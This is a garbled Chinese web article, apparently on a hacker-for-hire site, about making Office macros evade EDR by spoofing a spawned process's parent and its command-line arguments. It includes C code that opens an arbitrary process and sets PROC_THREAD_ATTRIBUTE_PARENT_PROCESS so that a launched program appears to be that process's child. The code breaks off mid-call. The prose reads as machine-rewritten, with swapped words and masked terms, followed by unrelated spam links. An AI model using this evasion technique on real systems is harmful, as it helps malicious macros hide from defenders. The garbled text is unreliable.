绕开EDR：结构Office宏欺骗父进程和命令行参数

访客3年前 (2021-01-17)关于黑客接单773

一、情况

大部分当代EDR解决 *** 都应用个人行为检验的 *** ，容许依据其个人行为来检验恶意程序，而不是只是应用IoC（比如：文档hash值、网站域名）。在本文中，我得出了欺骗新进程的父进程和命令行参数这二种技术的VBA完成方式。该类完成容许制做更为隐秘的Office宏，并使宏形成的进程看上去好像由另一个程序流程（比如explorer.exe）建立的，并具备看起来良好的命令行参数。

必须表明的是，我并不是明确提出这种技术的创作者，这种技术是由Will Burgess、Didier Stevens和Casey Smith明确提出的。

更先，大家将解读在Visual Basic中完成的技术情况。我之一次听见这种內容，是在Wild West Hackin’ Fest 2018中听到了Will Burgess的演说以后。

1.1 父进程欺骗

当进程派生出子进程时，比如Sy *** on这类的EDR解决 *** 会纪录该实际操作，另外会纪录各种各样信息，比如：新创建的进程名字、hash值、可实行途径及其相关父进程的信息。这针对预制构件个人行为标准十分有协助，例如，“Microsoft Word始终不容易派生出powershell.exe”。依据我的工作经验，这种标准具备较低的多元性、较高的增加值，仅在非常少状况下能产生乱报。

事实上，在应用Windows当地API建立进程时，能够特定一切进程做为父亲进程。这并并不是一个新鲜事儿，因而我不想在文中中更为详尽地叙述。事实上，Didier Stevens早在十年前就读过有关这一方面的文章内容。下边是一个C 编码的实例供大伙儿参照，将应用随意进程做为父进程，派生出cmd.exe。

// 本编码根据

#include "pch.h"

#include

int main(int argc, char **canttrustthis)

{

PROCESS_INFORMATION pi={ 0 };

STARTUPINFOEXA si={ 0 };

SIZE_T sizeToAllocate;

int parentPid=9524; // Could be found dynamically as well

// Get a handle on the parent process to use

HANDLE processHandle=OpenProcess(PROCESS_ALL_ACCESS, false, parentPid);

if (processHandle==NULL){

fprintf(stderr, "OpenProcess failed");

return 1;

}

// Initialize the process start attributes

InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);

// Allocate the size needed for the attribute list

si.lpAttributeList=(LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeToAllocate);

InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);

// Set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS option to specify the parent process to use

if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &processHandle, sizeof(HANDLE), NULL, NULL)){

fprintf(stderr, "UpdateProcThreadAttribute failed");

return 1;

}

si.StartupInfo.cb=sizeof(STARTUPINFOEXA);

printf("Creating process...

");

BOOL success=CreateProcessA(

NULL, // App name

"C:\\\\Windows\\\\system32\\\\calc.exe", // Command line

NULL, // Process attributes

NULL, // Thread attributes

true, // Inherits handles?

EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, // Creation flags

NULL, // Env

"C:\\\\Windows\\\\system32", // Current dir

(LPSTARTUPINFOA) &si,

&pi

标签: 绕过EDR：构造Office宏欺骗父进程和命令行参数

返回列表

上一篇：职场上如何正确提问？掌握关键3点完美应对

下一篇：腾讯面试题：给视频设计一个评分功能？

找黑客平台

绕开EDR：结构Office宏欺骗父进程和命令行参数

相关文章

红米k20和pro的区别

10万投资做什么生意好？这些生意前景极佳！

如何做网站？如何从零开始建立自己的网站

深圳高端商务服务联系方式-【金晶】

特朗普团队在美国密55年授衔歇根州的诉讼面临失效

蒙迪欧贴膜多少钱，新蒙迪欧贴膜

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.